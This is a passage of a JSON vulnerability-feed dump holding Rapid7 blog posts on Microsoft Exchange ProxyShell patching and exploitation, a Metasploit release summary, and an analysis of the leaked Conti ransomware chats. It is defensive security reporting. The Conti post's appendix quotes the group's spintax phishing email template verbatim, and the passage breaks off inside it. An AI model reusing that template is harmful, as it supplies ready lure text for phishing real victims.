"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-04T07:02:32", "id": "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "href": "https://thehackernews.com/2023/08/major-cybersecurity-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>),, [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems and has been observed targeted by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n_Conti announcement of support for Russian government_\n\n_Conti walk-back of their support for Russia_\n\n_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} 